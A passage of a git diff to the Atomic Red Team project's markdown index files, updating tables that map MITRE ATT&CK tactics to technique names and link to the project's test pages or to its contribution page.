Poisoning [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Binary Padding](../../T1027.001/T1027.001.md) | [Bash History](../../T1552.003/T1552.003.md) | Application Window Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive Collected Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Linux or Mac System Logs](../../T1070.002/T1070.002.md) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | +| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Extensions](../../T1176/T1176.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Code Signing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials In Files](../../T1552.001/T1552.001.md) | Domain Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Compromise Client Software Binary [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [File and Directory Discovery](../../T1083/T1083.md) | SSH [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchctl](../../T1569.001/T1569.001.md) | Create Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Local Account](../../T1087.001/T1087.001.md) | SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launchd](../../T1053.004/T1053.004.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Deobfuscate/Decode Files or Information [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Local Groups](../../T1069.001/T1069.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious File [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disable or Modify System Firewall [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [GUI Input Capture](../../T1056.002/T1056.002.md) | [Network Service Scanning](../../T1046/T1046.md) | VNC [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Default Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Share Discovery](../../T1135/T1135.md) | | Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Attachment [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Native API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Keychain](../../T1555.001/T1555.001.md) | [Network Sniffing](../../T1040/T1040.md) | | Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Python [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Spearphishing via Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Elevated Execution with Prompt [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic Resolution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Supply Chain Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scripting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Emond](../../T1546.014/T1546.014.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Permission Groups Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [GUI Input Capture](../../T1056.002/T1056.002.md) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Encrypted Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Trusted Relationship [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [Process Discovery](../../T1057/T1057.md) | | Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | External Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Source [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Remote System Discovery](../../T1018/T1018.md) | | Keylogging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Fallback Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [File Deletion](../../T1070.004/T1070.004.md) | Password Cracking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Fast Flux DNS [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Unix Shell](../../T1059.004/T1059.004.md) | LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Password Guessing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | File Transfer Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Agent](../../T1543.001/T1543.001.md) | [Launchd](../../T1053.004/T1053.004.md) | [Gatekeeper Bypass](../../T1553.001/T1553.001.md) | Password Spraying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Checks](../../T1497.001/T1497.001.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Visual Basic [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Launch Daemon](../../T1543.004/T1543.004.md) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Screen Capture](../../T1113/T1113.md) | | [Internal Proxy](../../T1090.001/T1090.001.md) | [Resource Hijacking](../../T1496/T1496.md) | +| | | [Launchd](../../T1053.004/T1053.004.md) | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | [Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Plist Modification](../../T1547.011/T1547.011.md) | [Hidden Users](../../T1564.002/T1564.002.md) | Securityd Memory [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Owner/User Discovery](../../T1033/T1033.md) | | | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Stop [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Logon Script (Mac)](../../T1037.002/T1037.002.md) | [Rc.common](../../T1037.004/T1037.004.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | [Plist Modification](../../T1547.011/T1547.011.md) | [Re-opened Applications](../../T1547.007/T1547.007.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Impair Command History Logging](../../T1562.003/T1562.003.md) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | [Rc.common](../../T1037.004/T1037.004.md) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Startup Items](../../T1037.005/T1037.005.md) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Non-Standard Port](../../T1571/T1571.md) | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | @@ -60,5 +60,6 @@ | | | | | [Timestomp](../../T1070.006/T1070.006.md) | | | | | | | | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index 5c681900..a4b8e7ab 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -1,102 +1,112 @@ # All Atomic Tests by ATT&CK Tactic & Technique | initial-access | execution | persistence | privilege-escalation | defense-evasion | credential-access | discovery | lateral-movement | collection | exfiltration | command-and-control | impact | |-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----|-----| -| Cloud Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppleScript](../../T1059.002/T1059.002.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | [.bash_profile and .bashrc](../../T1546.004/T1546.004.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [/etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Account Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive Collected Data](../../T1560/T1560.md) | [Automated Exfiltration](../../T1020/T1020.md) | Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Account Access Removal](../../T1531/T1531.md) | -| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [Accessibility Features](../../T1546.008/T1546.008.md) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Bash History](../../T1552.003/T1552.003.md) | [Application Window Discovery](../../T1010/T1010.md) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | Asymmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | [Account Manipulation](../../T1098/T1098.md) | Access Token Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application Access Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | [Distributed Component Object Model](../../T1021.003/T1021.003.md) | Archive via Library [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Bidirectional Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add Office 365 Global Administrator Role [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Accessibility Features](../../T1546.008/T1546.008.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | Cached Domain Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Archive via Utility](../../T1560.001/T1560.001.md) | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Data Destruction](../../T1485/T1485.md) | -| [Default Accounts](../../T1078.001/T1078.001.md) | Component Object Model [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Add-ins [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [BITS Jobs](../../T1197/T1197.md) | Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Groups [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Internal Spearphishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Audio Capture](../../T1123/T1123.md) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Additional Azure Service Principal Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Binary Padding](../../T1027.001/T1027.001.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Automated Collection](../../T1119/T1119.md) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DNS](../../T1071.004/T1071.004.md) | Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Drive-by Compromise [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Cron](../../T1053.003/T1053.003.md) | AppCert DLLs [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Credential Stuffing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Pass the Hash](../../T1550.002/T1550.002.md) | [Clipboard Data](../../T1115/T1115.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | DNS Calculation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Dynamic Data Exchange](../../T1559.002/T1559.002.md) | [AppInit DLLs](../../T1546.010/T1546.010.md) | [Asynchronous Procedure Call](../../T1055.004/T1055.004.md) | [Bypass User Access Control](../../T1548.002/T1548.002.md) | [Credentials In Files](../../T1552.001/T1552.001.md) | [Domain Account](../../T1087.002/T1087.002.md) | [Pass the Ticket](../../T1550.003/T1550.003.md) | Confluence [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Direct Network Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| [External Remote Services](../../T1133/T1133.md) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Application Shimming](../../T1546.011/T1546.011.md) | [At (Linux)](../../T1053.001/T1053.001.md) | [CMSTP](../../T1218.003/T1218.003.md) | Credentials from Password Stores [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Domain Groups](../../T1069.002/T1069.002.md) | [RDP Hijacking](../../T1563.002/T1563.002.md) | [Credential API Hooking](../../T1056.004/T1056.004.md) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data Obfuscation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Hardware Additions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Linux)](../../T1053.001/T1053.001.md) | [At (Windows)](../../T1053.002/T1053.002.md) | [COR_PROFILER](../../T1574.012/T1574.012.md) | [Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Domain Trust Discovery](../../T1482/T1482.md) | [Remote Desktop Protocol](../../T1021.001/T1021.001.md) | Data Staged [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dead Drop Resolver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [At (Windows)](../../T1053.002/T1053.002.md) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Clear Command History](../../T1070.003/T1070.003.md) | [Credentials in Registry](../../T1552.002/T1552.002.md) | Email Account [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exfiltration Over Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Fronting [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Disk Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | -| Phishing [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | JavaScript/JScript [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Authentication Package [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Boot or Logon Autostart Execution 